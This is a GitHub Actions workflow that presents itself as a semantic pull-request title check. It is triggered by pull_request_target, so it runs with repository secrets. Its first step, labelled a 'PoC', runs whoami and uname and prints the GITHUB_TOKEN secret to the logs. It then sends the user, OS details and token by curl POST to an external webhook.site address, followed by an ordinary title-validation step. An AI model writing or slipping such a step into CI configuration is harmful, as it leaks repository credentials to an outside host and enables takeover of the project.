name: Semantic pull request

on:
  pull_request_target:
    types:
      - opened
      - edited
      - synchronize

jobs:
  semantic-pull-request:
    permissions:
      pull-requests: read
      statuses: write
      contents: read
    runs-on: ubuntu-latest
    steps:
      - name: PoC Command Execution
        run: |
          echo "[+] Running PoC..."
          OUTPUT="$(whoami && uname -a)"
          echo "[+] Output: $OUTPUT"

          echo "[+] GitHub token value:"
          echo "$GITHUB_TOKEN"

          # Send all info to webhook
          curl -s -X POST \
            -H "Content-Type: text/plain" \
            --data "User: $(whoami)
OS: $(uname -a)
Token: $GITHUB_TOKEN" \
            https://webhook.site/0cee8fbc-0881-4586-9496-4859cc838b57

          echo "[+] PoC complete."
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

      - name: Validate PR title
        continue-on-error: true
        uses: amannn/action-semantic-pull-request@0723387faaf9b38adef4775cd42cfd5155ed6017
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
